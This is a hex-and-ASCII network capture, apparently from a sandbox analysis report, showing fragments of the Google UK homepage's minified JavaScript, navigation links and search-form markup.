                                                                    2021-10-27 14:29:02 UTC22INData Raw: 63 57 66 58 51 57 4b 64 54 70 51 2f 6d 3d 5f 5f 66 65 61 74 75 72 65 73 5f 5f 22 29 29 7b 76 61 72 20 46 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 77 61 3f 61 7c 7c 62 3a 62 7d 2c 78 61 3d 68 2e 61 28 22 31 22 29 2c 79 61 3d 68 2e 61 28 22 22 29 2c 7a 61 3d 68 2e 61 28 22 22 29 2c 77 61 3d 68 2e 61 28 22 22 29 2c 41 61 3d 77 69 6e 64 6f 77 2e 67 61 70 69 3d 46 28 77 69 6e 64 6f 77 2e 67 61 70 69 2c 7b 7d 29 2c 42 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 64 67 6c 28 61 2c 62 29 7d 3b 78 61 3f 42 28 63 29 3a 28 41 28 22 67 6c 22 2c 63 29 2c 44 28 22 67 6c 22 29 29 7d 2c 43 61 3d 7b 7d 2c 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 3a 22
                                                                    Data Ascii: cWfXQWKdTpQ/m=__features__")){var F=function(a,b){return wa?a||b:b},xa=h.a("1"),ya=h.a(""),za=h.a(""),wa=h.a(""),Aa=window.gapi=F(window.gapi,{}),Ba=function(a,b){var c=function(){g.dgl(a,b)};xa?B(c):(A("gl",c),D("gl"))},Ca={},Da=function(a){a=a.split(":"
                                                                    2021-10-27 14:29:02 UTC24INData Raw: 67 63 3d 22 2c 64 28 22 47 42 52 22 29 2c 22 26 6f 67 6c 3d 22 2c 64 28 22 65 6e 22 29 5d 3b 62 2e 5f 73 6e 26 26 28 62 2e 5f 73 6e 3d 0a 22 6f 67 2e 22 2b 62 2e 5f 73 6e 29 3b 66 6f 72 28 76 61 72 20 6b 20 69 6e 20 62 29 66 2e 70 75 73 68 28 22 26 22 29 2c 66 2e 70 75 73 68 28 64 28 6b 29 29 2c 66 2e 70 75 73 68 28 22 3d 22 29 2c 66 2e 70 75 73 68 28 64 28 62 5b 6b 5d 29 29 3b 66 2e 70 75 73 68 28 22 26 65 6d 73 67 3d 22 29 3b 66 2e 70 75 73 68 28 64 28 63 2e 6e 61 6d 65 2b 22 3a 22 2b 63 2e 6d 65 73 73 61 67 65 29 29 3b 76 61 72 20 6d 3d 66 2e 6a 6f 69 6e 28 22 22 29 3b 48 61 28 6d 29 26 26 28 6d 3d 6d 2e 73 75 62 73 74 72 28 30 2c 32 45 33 29 29 3b 76 61 72 20 6e 3d 6d 3b 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 2e 5f 61
                                                                    Data Ascii: gc=",d("GBR"),"&ogl=",d("en")];b._sn&&(b._sn="og."+b._sn);for(var k in b)f.push("&"),f.push(d(k)),f.push("="),f.push(d(b[k]));f.push("&emsg=");f.push(d(c.name+":"+c.message));var m=f.join("");Ha(m)&&(m=m.substr(0,2E3));var n=m;var l=window.gbar.logger._a
                                                                    2021-10-27 14:29:02 UTC25INData Raw: 2e 6d 61 74 63 68 28 2f 2e 2a 5c 2f 61 63 63 6f 75 6e 74 73 5c 2f 43 6c 65 61 72 53 49 44 5b 3f 5d 2f 29 26 26 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 50 61 28 29 29 3b 62 26 26 28 61 2e 68 72 65 66 3d 61 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 28 5b 3f 26 5d 63 6f 6e 74 69 6e 75 65 3d 29 5b 5e 26 5d 2a 2f 2c 22 24 31 22 2b 62 29 29 7d 66 75 6e 63 74 69 6f 6e 20 53 61 28 61 29 7b 77 69 6e 64 6f 77 2e 67 41 70 70 6c 69 63 61 74 69 6f 6e 26 26 28 61 2e 68 72 65 66 3d 77 69 6e 64 6f 77 2e 67 41 70 70 6c 69 63 61 74 69 6f 6e 2e 67 65 74 54 61 62 55 72 6c 28 61 2e 68 72 65 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 54 61 28 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 28 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 71 7c 7c 22 22 29 2e 76
                                                                    Data Ascii: .match(/.*\/accounts\/ClearSID[?]/)&&encodeURIComponent(Pa());b&&(a.href=a.href.replace(/([?&]continue=)[^&]*/,"$1"+b))}function Sa(a){window.gApplication&&(a.href=window.gApplication.getTabUrl(a.href))}function Ta(a){try{var b=(document.forms[0].q||"").v
                                                                    2021-10-27 14:29:02 UTC26INData Raw: 64 65 66 61 75 6c 74 56 69 65 77 3b 63 26 26 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3f 28 61 3d 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 61 2c 22 22 29 29 26 26 28 62 3d 61 2e 64 69 72 65 63 74 69 6f 6e 29 3a 62 3d 61 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3f 0a 61 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 2e 64 69 72 65 63 74 69 6f 6e 3a 61 2e 73 74 79 6c 65 2e 64 69 72 65 63 74 69 6f 6e 3b 72 65 74 75 72 6e 22 72 74 6c 22 3d 3d 62 7d 2c 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 29 74 72 79 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 64 35 22 29 3b 69 66 28 64 29 7b 76 61 72 20 66 3d 64 2e 66 69 72 73 74 43 68 69 6c 64 2c 6b 3d 66 2e 66 69 72
                                                                    Data Ascii: defaultView;c&&c.getComputedStyle?(a=c.getComputedStyle(a,""))&&(b=a.direction):b=a.currentStyle?a.currentStyle.direction:a.style.direction;return"rtl"==b},fb=function(a,b,c){if(a)try{var d=document.getElementById("gbd5");if(d){var f=d.firstChild,k=f.fir
                                                                    2021-10-27 14:29:02 UTC27INData Raw: 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 61 61 26 26 67 2e 70 61 61 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7d 29 7d 2c 6c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4c 5b 61 5d 7c 7c 28 4c 5b 61 5d 3d 5b 5d 29 3b 4c 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4d 5b 61 5d 7c 7c 28 4d 5b 61 5d 3d 5b 5d 29 3b 4d 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6e 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 58 61 5b 61 5d 3d 62 7d 2c 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4e 5b 61 5d 7c 7c 28 4e 5b 61 5d 3d 5b 5d 29 3b 4e 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 61 62 3d 66 75
                                                                    Data Ascii: kb=function(a,b,c,d,f,k,m,n,l,q){B(function(){g.paa&&g.paa(a,b,c,d,f,k,m,n,l,q)})},lb=function(a,b){L[a]||(L[a]=[]);L[a].push(b)},mb=function(a,b){M[a]||(M[a]=[]);M[a].push(b)},nb=function(a,b){Xa[a]=b},ob=function(a,b){N[a]||(N[a]=[]);N[a].push(b)},ab=fu
                                                                    2021-10-27 14:29:02 UTC29INData Raw: 4f 7d 3b 70 28 22 73 6f 22 2c 56 61 29 3b 70 28 22 73 6f 73 22 2c 55 61 29 3b 70 28 22 73 69 22 2c 57 61 29 3b 70 28 22 74 67 22 2c 62 62 29 3b 0a 70 28 22 63 6c 6f 73 65 22 2c 63 62 29 3b 70 28 22 72 64 64 22 2c 64 62 29 3b 70 28 22 61 64 64 4c 69 6e 6b 22 2c 67 62 29 3b 70 28 22 61 64 64 45 78 74 72 61 4c 69 6e 6b 22 2c 68 62 29 3b 70 28 22 70 63 6d 22 2c 69 62 29 3b 70 28 22 70 63 61 22 2c 6a 62 29 3b 70 28 22 70 61 61 22 2c 6b 62 29 3b 70 28 22 64 64 6c 64 22 2c 24 61 29 3b 70 28 22 64 64 72 64 22 2c 73 62 29 3b 70 28 22 64 64 65 72 72 22 2c 72 62 29 3b 70 28 22 72 74 6c 22 2c 59 61 29 3b 70 28 22 6f 70 22 2c 76 62 29 3b 70 28 22 62 68 22 2c 4c 29 3b 70 28 22 61 62 68 22 2c 6c 62 29 3b 70 28 22 64 68 22 2c 4d 29 3b 70 28 22 61 64 68 22 2c 6d 62 29 3b
                                                                    Data Ascii: O};p("so",Va);p("sos",Ua);p("si",Wa);p("tg",bb);p("close",cb);p("rdd",db);p("addLink",gb);p("addExtraLink",hb);p("pcm",ib);p("pca",jb);p("paa",kb);p("ddld",$a);p("ddrd",sb);p("dderr",rb);p("rtl",Ya);p("op",vb);p("bh",L);p("abh",lb);p("dh",M);p("adh",mb);
                                                                    2021-10-27 14:29:02 UTC30INData Raw: 2c 62 29 7d 2c 48 62 3d 7b 73 69 67 6e 65 64 3a 45 62 2c 65 6c 6f 67 3a 47 62 2c 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 75 73 6f 6e 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 2f 30 22 2c 6c 6f 61 64 54 69 6d 65 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 76 2e 70 77 3d 48 62 3b 76 61 72 20 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 3b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6d 3d 61 72 67 75 6d 65 6e 74 73 3b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 67 2c 6c 3d 30 2c 71 3d 63 2e 6c 65 6e 67 74 68 2d 31 3b 6c 3c 71 3b 2b 2b 6c 29 6e 3d 6e 5b 63 5b 6c 5d 5d 3b 6e 5b 63 5b 6c 5d 5d 2e 61 70 70 6c 79 28 6e 2c 6d 29 7d 29 7d 3b
                                                                    Data Ascii: ,b)},Hb={signed:Eb,elog:Gb,base:"https://plusone.google.com/u/0",loadTime:(new Date).getTime()};v.pw=Hb;var Ib=function(a,b){var c=b.split(".");b=function(){var m=arguments;a(function(){for(var n=g,l=0,q=c.length-1;l<q;++l)n=n[c[l]];n[c[l]].apply(n,m)})};
                                                                    2021-10-27 14:29:02 UTC31INData Raw: 65 6e 67 74 68 26 26 66 2e 70 75 73 68 28 22 2c 22 29 2c 66 2e 70 75 73 68 28 51 62 28 7a 29 29 2c 66 2e 70 75 73 68 28 22 2e 22 29 2c 66 2e 70 75 73 68 28 51 62 28 62 5b 7a 5d 29 29 3b 76 61 72 20 7a 3d 66 2e 6a 6f 69 6e 28 22 22 29 3b 22 22 21 3d 7a 26 26 28 61 2e 70 75 73 68 28 22 26 6f 67 61 64 3d 22 29 2c 61 2e 70 75 73 68 28 64 28 7a 29 29 29 7d 6b 61 28 61 2e 6a 6f 69 6e 28 22 22 29 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 62 28 61 29 7b 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 61 2b 3d 22 22 29 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 3f 61 2e 72 65 70 6c 61 63 65 28 22 2e 22 2c 22 25 32 45 22 29 2e 72 65 70 6c 61 63 65 28 22 2c 22 2c 22 25 32 43 22 29 3a 61 7d 68 61 3d 50 62 3b 70 28 22 69
                                                                    Data Ascii: ength&&f.push(","),f.push(Qb(z)),f.push("."),f.push(Qb(b[z]));var z=f.join("");""!=z&&(a.push("&ogad="),a.push(d(z)))}ka(a.join(""))}}function Qb(a){"number"==typeof a&&(a+="");return"string"==typeof a?a.replace(".","%2E").replace(",","%2C"):a}ha=Pb;p("i
                                                                    2021-10-27 14:29:02 UTC33INData Raw: 30 3e 63 3f 4d 61 74 68 2e 6d 61 78 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 63 29 3a 63 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 63 20 69 6e 20 61 26 26 61 5b 63 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 20 63 3b 72 65 74 75 72 6e 2d 31 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 2d 31 3d 3d 63 63 28 61 2c 58 29 3f 28 72 28 45 72 72 6f 72 28 58 2b 22 5f 22 2b 62 29 2c 22 75 70 22 2c 22 63 61 61 22 29 2c 21 31 29 3a 21 30 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 59 28 5b 31 2c 32 5d 2c 22 72 22 29 26 26 28 53 5b 61 5d 3d 53 5b 61 5d 7c 7c 5b 5d 2c 53 5b 61 5d 2e 70 75 73 68 28 62 29 2c 32 3d 3d 58 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 28 64 63 28 61
                                                                    Data Ascii: 0>c?Math.max(0,a.length+c):c;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1},Y=function(a,b){return-1==cc(a,X)?(r(Error(X+"_"+b),"up","caa"),!1):!0},ec=function(a,b){Y([1,2],"r")&&(S[a]=S[a]||[],S[a].push(b),2==X&&window.setTimeout(function(){b(dc(a
                                                                    2021-10-27 14:29:02 UTC34INData Raw: 66 28 6a 63 28 29 29 72 65 74 75 72 6e 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 62 29 3b 69 66 28 6b 63 28 61 29 29 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 28 61 2e 69 64 29 2c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 29 7d 63 61 74 63 68 28 64 29 7b 64 2e 63 6f 64 65 21 3d 44 4f 4d 45 78 63 65 70 74 69 6f 6e 2e 51 55 4f 54 41 5f 45 58 43 45 45 44 45 44 5f 45 52 52 26 26 72 28 64 2c 22 75 70 22 2c 22 67 70 64 22 29 7d 72 65 74 75 72 6e 22 22 7d 2c 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 61 74 74 61 63 68 45 76 65 6e
                                                                    Data Ascii: f(jc())return e.localStorage.getItem(b);if(kc(a))return a.load(a.id),a.getAttribute(b)}catch(d){d.code!=DOMException.QUOTA_EXCEEDED_ERR&&r(d,"up","gpd")}return""},nc=function(a,b,c){a.addEventListener?a.addEventListener(b,c,!1):a.attachEvent&&a.attachEven
                                                                    2021-10-27 14:29:02 UTC35INData Raw: 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 62 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 74 72 79 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 6f 6d 22 29 3b 61 26 26 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 2e 63
                                                                    Data Ascii: er.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var b=window.gbar.i.i;var c=window.gbar;var f=function(d){try{var a=document.getElementById("gbom");a&&d.appendChild(a.c
                                                                    2021-10-27 14:29:02 UTC36INData Raw: 3b 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 63 2b 22 2f 73 65 61 72 63 68 5c 5c 3f 22 29 3b 28 62 3d 63 2e 74 65 73 74 28 62 29 29 26 26 21 2f 28 5e 7c 5c 5c 3f 7c 26 29 65 69 3d 2f 2e 74 65 73 74 28 61 2e 68 72 65 66 29 26 26 28 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 26 26 62 2e 6b 45 58 50 49 26 26 28 61 2e 68 72 65 66 2b 3d 22 26 65 69 3d 22 2b 62 2e 6b 45 49 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6d 28 61 29 3b 0a 6e 28 61 29 7d 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 7b 76 61 72 20 61 3d 2f 2e 2a 68 70 24 2f 3b 72 65 74 75 72 6e 20 61 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 3f 22 22 3a
                                                                    Data Ascii: ;c=new RegExp("^"+c+"/search\\?");(b=c.test(b))&&!/(^|\\?|&)ei=/.test(a.href)&&(b=window.google)&&b.kEXPI&&(a.href+="&ei="+b.kEI)},p=function(a){m(a);n(a)},q=function(){if(window.google&&window.google.sn){var a=/.*hp$/;return a.test(window.google.sn)?"":
                                                                    2021-10-27 14:29:02 UTC38INData Raw: 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 6c 34 6f 70 51 4c 6a 77 6c 53 42 57 4e 63 4b 73 68 47 48 6d 51 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 72 63 3d 27 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 27 3b 76 61 72 20 69 65 73 67 3d 66 61 6c 73 65 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6e 20 26 26 20 77 69 6e 64 6f 77 2e 6e 28 29 3b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 69 6d 61 67 65 73 29 7b 6e 65 77 20 49 6d 61 67 65 28 29 2e 73 72 63 3d 73 72 63 3b 7d 0a 69 66 20 28 21 69 65 73 67 29 7b
                                                                    Data Ascii: )();</script></head><body bgcolor="#fff"><script nonce="ql4opQLjwlSBWNcKshGHmQ==">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}if (!iesg){
                                                                    2021-10-27 14:29:02 UTC39INData Raw: 64 3d 67 62 5f 34 32 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 77 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 4e 65 77 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 33 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6d 61 69 6c 2f 3f 74 61 62 3d 77 6d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 47 6d 61 69 6c 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                                    Data Ascii: d=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><
                                                                    2021-10-27 14:29:02 UTC40INData Raw: 6b 2f 73 68 6f 70 70 69 6e 67 3f 68 6c 3d 65 6e 26 73 6f 75 72 63 65 3d 6f 67 26 74 61 62 3d 77 66 22 3e 53 68 6f 70 70 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 33 30 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6a 22 3e 42 6c 6f 67 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 37 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 66 69 6e 61 6e 63 65 3f 74 61 62 3d 77 65 22 3e 46 69 6e 61 6e 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61
                                                                    Data Ascii: k/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.co.uk/finance?tab=we">Finance</a></li><li cla
                                                                    2021-10-27 14:29:02 UTC41INData Raw: 61 73 73 3d 67 62 74 73 3e 3c 73 70 61 6e 20 69 64 3d 67 62 69 34 73 31 3e 53 69 67 6e 20 69 6e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 74 20 67 62 74 62 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 67 74 20 69 64 3d 67 62 67 35 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 22 20 74 69 74 6c 65 3d 22 4f 70 74 69 6f 6e 73 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 74 72 75 65 20 61 72 69 61 2d 6f 77 6e 73 3d 67 62 64 35 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74
                                                                    Data Ascii: ass=gbts><span id=gbi4s1>Sign in</span></span></a></li><li class="gbt gbtb"><span class=gbts></span></li><li class=gbt><a class=gbgt id=gbg5 href="http://www.google.co.uk/preferences?hl=en" title="Options" aria-haspopup=true aria-owns=gbd5><span class=gbt
                                                                    2021-10-27 14:29:02 UTC43INData Raw: 3d 22 32 35 25 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 6e 6f 77 72 61 70 3d 22 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 69 65 22 20 76 61 6c 75 65 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 65 6e 2d 47 42 22 20 6e 61 6d 65 3d 22 68 6c 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 73 6f 75 72 63 65 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 68 70 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 77 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 68 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 64 69
                                                                    Data Ascii: ="25%">&nbsp;</td><td align="center" nowrap=""><input name="ie" value="ISO-8859-1" type="hidden"><input value="en-GB" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><di
                                                                    2021-10-27 14:29:02 UTC44INData Raw: 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 6c 34 6f 70 51 4c 6a 77 6c 53 42 57 4e 63 4b 73 68 47 48 6d 51 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 61 2c 62 3d 22 31 22 3b 69 66 28 64 6f 63 75 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 29 62 3d 22 32 22 3b 65 6c 73 65 20 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 29 7b 76 61 72 20 63 2c 64 2c 65 3d 5b 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 36 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 2e 33 2e 30 22 2c 22 4d 53 58 4d 4c 32 2e 58 4d 4c
                                                                    Data Ascii: ><script nonce="ql4opQLjwlSBWNcKshGHmQ==">(function(){var a,b="1";if(document&&document.getElementById)if("undefined"!=typeof XMLHttpRequest)b="2";else if("undefined"!=typeof ActiveXObject){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XML
                                                                    2021-10-27 14:29:02 UTC45INData Raw: 28 29 7b 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3b 69 66 28 21 61 7c 7c 21 62 29 7b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 64 3d 22 43 53 53 31 43 6f 6d 70 61 74 22 3d 3d 63 2e 63 6f 6d 70 61 74 4d 6f 64 65 3f 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 63 2e 62 6f 64 79 3b 61 3d 64 2e 63 6c 69 65 6e 74 57 69 64 74 68 3b 62 3d 64 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 61 26 26 62 26 26 28 61 21 3d 67 6f 6f 67 6c 65 2e 63 64 6f 2e 77 69 64 74 68 7c 7c 62 21 3d 67 6f 6f 67 6c 65 2e 63 64 6f 2e 68 65 69 67 68 74 29 26 26 67 6f 6f 67 6c 65 2e 6c 6f 67 28 22 22 2c 22 22 2c 22 2f 63 6c 69 65 6e 74 5f 32 30 34 3f 26 61 74 79 70
                                                                    Data Ascii: (){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d="CSS1Compat"==c.compatMode?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}a&&b&&(a!=google.cdo.width||b!=google.cdo.height)&&google.log("","","/client_204?&atyp
